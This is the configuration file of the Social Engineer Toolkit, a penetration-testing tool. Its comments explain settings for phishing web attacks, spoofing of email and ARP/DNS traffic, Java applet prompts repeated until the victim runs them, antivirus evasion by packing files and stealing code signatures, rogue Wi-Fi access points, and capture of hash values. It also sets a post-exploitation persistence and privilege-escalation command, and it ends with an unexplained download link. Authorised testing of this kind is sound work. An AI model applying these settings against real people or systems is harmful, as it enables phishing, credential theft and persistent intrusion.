################################################################################
################################################################################
##
## The following config file will allow you to customize settings within
## the Social Engineer Toolkit. The lines that do not have comment code
## ("#") are the fields you want to toy with. They are pretty easy to
## understand.
##
## The Metasploit path is the default path for where Metasploit is located.
## Metasploit is required for SET to function properly.
##
## The ETTERCAP function specifies if you want to use ARP Cache poisoning in
## conjunction with the web attacks, note that ARP Cache poisoning is only
## for internal subnets only and does not work against people on the internet.
##
## The SENDMAIL option allows you to spoof source IP addresses utilizing an
## application called SendMail. Sendmail is NOT installed by default on BackTrack5.
## To spoof email addresses when performing the mass email attacks, you must
## install Sendmail manually using: apt-get install sendmail
##
## Note that ETTERCAP and SENDMAIL flags only accept ON or OFF switches.
##
## Note that the Metasploit_PATH cannot have a / after the folder name.
##
## There are additional options, read the comments for additional descriptions.
##
################################################################################
################################################################################
#
# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/opt/framework3/msf3
#
# DEFINE TO USE ETTERCAP OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
ETTERCAP=OFF
#
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP OR DSNIFF TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_DSNIFF_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
#
# DEFINE TO USE DSNIFF OR NOT WHEN USING WEBSITE ATTACK ONLY SET TO ON AND OFF
# IF DSNIFF IS SET TO ON, ETTERCAP WILL AUTOMATICALLY BE DISABLED.
DSNIFF=OFF
#
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
#
# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF
#
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---> JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
#
# THIS FLAG WILL SET THE JAVA ID FLAG WITHIN THE JAVA APPLET TO SOMETHING DIFFERENT.
# THIS COULD BE TO MAKE IT LOOK MORE BELIEVABLE OR FOR BETTER OBFUSCATION
JAVA_ID_PARAM=Secure Java Applet
#
# JAVA APPLET REPEATER OPTION WILL CONTINUE TO PROMPT THE USER WITH THE JAVA APPLET IF
# THE USER HITS CANCEL. THIS MEANS IT WILL BE NON STOP UNTIL RUN IS EXECUTED. THIS GIVES
# A BETTER SUCCESS RATE FOR THE JAVA APPLET ATTACK
JAVA_REPEATER=ON
#
# JAVA REPEATER TIMING WHICH IS THE DELAY IT TAKES BETWEEN THE USER HITTING CANCEL TO
# WHEN THE NEXT JAVA APPLET RUNS. BE CAREFUL SETTING TOO LOW AS IT WILL SPAWN THEM OVER
# AND OVER EVEN IF THEY HIT RUN. 200 EQUALS 2 SECONDS.
JAVA_TIME=200
# AUTO DETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
#
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80
#
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary
#
# MAN LEFT IN THE MIDDLE PORT, THIS WILL BE USED FOR THE WEB SERVER BIND PORT
MLITM_PORT=80
#
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
#
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOU'RE USING THIS FLAG, ENSURE OPENSSL IS INSTALLED! TO TURN THIS ON TURN SELF_SIGNED_CERT
# TO THE ON POSITION.
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
#
# TWEAK THE WEB JACKING TIME USED FOR THE ****** REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000
#
# PORT FOR THE COMMAND CENTER
COMMAND_CENTER_PORT=44444
#
# COMMAND CENTER INTERFACE TO BIND TO BY DEFAULT IT IS LOCALHOST ONLY. IF YOU WANT TO ENABLE IT
# SO YOU CAN HIT THE COMMAND CENTER REMOTELY PUT THE INTERFACE TO 0.0.0.0 TO BIND TO ALL INTERFACES.
COMMAND_CENTER_INTERFACE=127.0.0.1
#
# HOW MANY TIMES SET SHOULD ENCODE A PAYLOAD IF YOU ARE USING STANDARD METASPLOIT ENCODING OPTIONS
ENCOUNT=4
#
# WHAT DO YOU WANT TO USE FOR YOUR DEFAULT TERMINAL WITHIN THE COMMAND CENTER. THE DEFAULT IS XTERM
# THE OPTIONS YOU HAVE ARE AS FOLLOWS - GNOME, KONSOLE, XTERM, SOLO. IF YOU SELECT SOLO IT WILL PLACE
# ALL RESULTS IN THE SAME SHELL YOU USED TO OPEN THE SET-WEB INTERFACE. THIS IS USEFUL IF YOU'RE USING
# SOMETHING THAT ONLY HAS ONE CONSOLE, LET'S SAY AN IPHONE OR IPAD.
TERMINAL=SOLO
#
# IF THIS OPTION IS SET, THE METASPLOIT PAYLOADS WILL AUTOMATICALLY MIGRATE TO
# NOTEPAD ONCE THE APPLET IS EXECUTED. THIS IS BENEFICIAL IF THE VICTIM CLOSES
# THE BROWSER HOWEVER CAN INTRODUCE BUGGY RESULTS WHEN AUTO MIGRATING.
AUTO_MIGRATE=OFF
#
# DIGITAL SIGNATURE STEALING METHOD MUST HAVE THE PEFILE PYTHON MODULES LOADED
# FROM http://code.google.com/p/pefile/. BE SURE TO INSTALL THIS BEFORE TURNING
# THIS FLAG ON!!! THIS FLAG GIVES MUCH BETTER AV DETECTION
DIGITAL_SIGNATURE_STEAL=ON
#
# THESE TWO OPTIONS WILL TURN THE UPX PACKER TO ON AND AUTOMATICALLY ATTEMPT
# TO PACK THE EXECUTABLE WHICH MAY EVADE ANTI-VIRUS A LITTLE BETTER.
UPX_ENCODE=ON
UPX_PATH=/usr/bin/upx
#
# HERE WE CAN RUN MULTIPLE METERPRETER SCRIPTS ONCE A SESSION IS ACTIVE. THIS
# MAY BE IMPORTANT IF WE ARE SLEEPING AND NEED TO RUN PERSISTENCE, TRY TO ELEVATE
# PERMISSIONS AND OTHER TASKS IN AN AUTOMATED FASHION. FIRST TURN THIS TRIGGER ON
# THEN CONFIGURE THE FLAGS. NOTE THAT YOU NEED TO SEPARATE THE COMMANDS BY A ;
METERPRETER_MULTI_SCRIPT=OFF
#
# WHAT COMMANDS DO YOU WANT TO RUN ONCE A METERPRETER SESSION HAS BEEN ESTABLISHED.
# BE SURE IF YOU WANT MULTIPLE COMMANDS TO SEPARATE WITH A ;. FOR EXAMPLE YOU COULD DO
# run getsystem;run hashdump;run persistence TO RUN THREE DIFFERENT COMMANDS
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
#
# THIS IS THE PORT THAT IS USED FOR THE ****** INJECTION USING THE METASPLOIT BROWSER ATTACKS
# BY DEFAULT THIS PORT IS 8080 HOWEVER EGRESS FILTERING MAY BLOCK THIS. MAY WANT TO ADJUST TO
# SOMETHING LIKE 21 OR 53
METASPLOIT_******_PORT=8080
#
# THIS FEATURE WILL TURN ON OR OFF THE AUTOMATIC REDIRECTION. BY DEFAULT FOR EXAMPLE IN MULTI-ATTACK
# THE SITE WILL REDIRECT ONCE ONE SUCCESSFUL ATTACK IS USED. SOME PEOPLE MAY WANT TO USE JAVA APPLET
# AND CREDENTIAL HARVESTER FOR EXAMPLE.
AUTO_REDIRECT=ON
#
# THIS FEATURE WILL AUTO EMBED AN IMG SRC TAG TO A UNC PATH OF YOUR ATTACK MACHINE.
# USEFUL IF YOU WANT TO INTERCEPT THE HALF LM KEYS WITH RAINBOWTABLES. WHAT WILL HAPPEN
# IS AS SOON AS THE VICTIM CLICKS THE WEB-PAGE LINK, A UNC PATH WILL BE INITIATED
# AND THE METASPLOIT CAPTURE/SMB MODULE WILL INTERCEPT THE HASH VALUES.
UNC_EMBED=OFF
#
# THIS FEATURE WILL ATTEMPT TO CREATE A ROGUE ACCESS POINT AND REDIRECT VICTIMS BACK TO THE
# SET WEB SERVER WHEN ASSOCIATED. AIRBASE-NG and DNSSPOOF.
ACCESS_POINT_SSID=linksys
AIRBASE_NG_PATH=/usr/local/sbin/airbase-ng
DNSSPOOF_PATH=/usr/local/sbin/dnsspoof
#
# EMAIL PROVIDER LIST SUPPORTS GMAIL, HOTMAIL, AND YAHOO. SIMPLY CHANGE IT TO THE PROVIDER YOU WANT TO
# USE.
EMAIL_PROVIDER=GMAIL
#
# THIS WILL CONFIGURE THE DEFAULT CHANNEL THAT THE WIRELESS ACCESS POINT ATTACK BROADCASTS ON THROUGH WIFI
# COMMUNICATIONS.
AP_CHANNEL=9
#
# THIS WILL REMOVE THE SET INTERACTIVE SHELL FROM THE MENU SELECTION. THE SET PAYLOADS ARE LARGE IN NATURE
# AND THINGS LIKE THE PWNIEXPRESS NEED SMALLER SET BUILDS
SET_INTERACTIVE_SHELL=ON
#
################################################################################
Download
http://www.mediafire.com/?jkos3pqtyneeutm